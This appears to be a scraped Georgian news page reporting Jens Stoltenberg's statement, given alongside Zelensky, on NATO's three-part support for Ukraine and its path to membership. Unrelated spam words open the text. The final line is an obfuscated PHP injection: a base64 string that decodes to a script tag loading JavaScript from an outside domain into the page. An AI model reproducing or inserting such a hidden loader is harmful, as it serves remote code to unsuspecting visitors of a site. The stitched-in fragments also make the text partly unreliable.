celsiusi
ავერსი შნაიდერი

შევთანხმდით სამნაწილიან დახმარებაზე, რომელიც უკრაინას ნატო-სთან დააახლოებს. უკრაინა ისე ახლოსაა ნატო-სთან, როგორც არასდროს. მოკავშირეებმა დაადასტურეს, რომ უკრაინა გახდება ალიანსის წევრი, – ამის შესახებ ნატო-ს გენერალურმა მდივანმა, იენს სტოლტენბერგმა უკრაინის პრეზიდენტთან, ვოლოდიმირ ზელენსკისთან ერთად გამართულ პრესკონფერენციაზე განაცხადა.

მისივე თქმით, როცა პირობები იქნება დაკმაყოფილებული, ალიანსი უკრაინას გასაწევრიანებლად მოწვევას გაუგზავნის.

„გასულ წელს, როცა რუსეთი შეიჭრა უკრაინაში, პუტინმა სათანადოდ ვერ შეაფასა უკრაინელი ხალხის სიმამაცე, უკრაინული ძალების გამბედაობა და უკრაინული პოლიტიკური ხელმძღვანელობის სიმტკიცე. ასევე, მან სათანადოდ ვერ შეაფასა ნატო-ს ალიანსის ერთობა, სიძლიერე. ნატო თქვენ გვერდით იქნება იქამდე, რამდენ ხანსაც საჭირო იქნება. გასულ წელს ნატო-ს მოკავშირეებმა უზრუნველყვეს ათეულობით მილიარდი დოლარის დახმარება. ახლა ჩვენ შევთანხმდით სამნაწილიან დახმარებაზე, რომელიც უკრაინას ნატო-სთან დააახლოებს: მრავალმხრივი პროგრამა, პრაქტიკული დახმარება, ნატო-უკრაინის ახალი საბჭოს დაფუძნება და კიდევ ერთხელ დადასტურება, რომ უკრაინა გახდება ნატო-ს წევრი და გაწევრიანების სამოქმედო გეგმის ამოღება.

ჩვენი დახმარების პროგრამა უკრაინას დაეხმარება საბჭოთა დროის აღჭურვილობიდან ნატო-ს აღჭურვილობასა და სტანდარტებზე გადასვლაში, რაც უკრაინულ ძალებს ნატო-სთან სრულად თავსებადს გახდის. ნატო-უკრაინის საბჭოს შეხვედრა რამდენიმე წუთში იწყება. ეს არის ფორუმი, სადაც უკრაინა და ნატო-ს მოკავშირეები შეხვდებიან, როგორც თანასწორები, გამართავენ კრიზისულ კონსულტაციებს და ერთად მიიღებენ გადაწყვეტილებებს.

უკრაინა ისე ახლოსაა ნატო-სთან, როგორც არასდროს. მოკავშირეებმა დაადასტურეს, რომ უკრაინა გახდება ალიანსის წევრი და რომ გაწევრიანების სამოქმედო გეგმის მოთხოვნები გაუქმდება. ეს შეცვლის უკრაინის წევრობის გზას ორნაბიჯიანი პროცესიდან ერთნაბიჯიან პროცესზე. ჩვენ გავუგზავნით მოწვევას უკრაინას, რომ შეუერთდეს ნატო-ს, როდესაც მოკავშირეები შეთანხმდებიან, რომ პირობები დაკმაყოფილებულია. ეს არის მოკავშირეების ძლიერი და ერთიანი გზავნილი უკრაინის ნატო-ს წევრობის გზაზე. ჩვენ უნდა უზრუნველვყოთ, რომ, როდესაც ეს ომი დასრულდება, გვექნება სანდო პირობები უკრაინის უსაფრთხოებისთვის. მივესალმები, რომ ბევრი მოკავშირე მზად არის, უზრუნველყოს გრძელვადიანი უსაფრთხოების დახმარება უკრაინისთვის. ეს დაეხმარება რუსეთის შემდგომი აგრესიის შეკავებას ამ ომის დასრულების შემდეგ. ვილნიუსში მიღებული გადაწყვეტილებები აღნიშნავს ახალი თავის დაწყებას ნატო-სა და უკრაინის ურთიერთობებში. დღეს ჩვენ ვხვდებით, როგორც თანასწორები. მოუთმენლად ველი დღეს, როდესაც შევხვდებით, როგორც მოკავშირეები“, – განაცხადა იენს სტოლტენბერგმა.

213
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");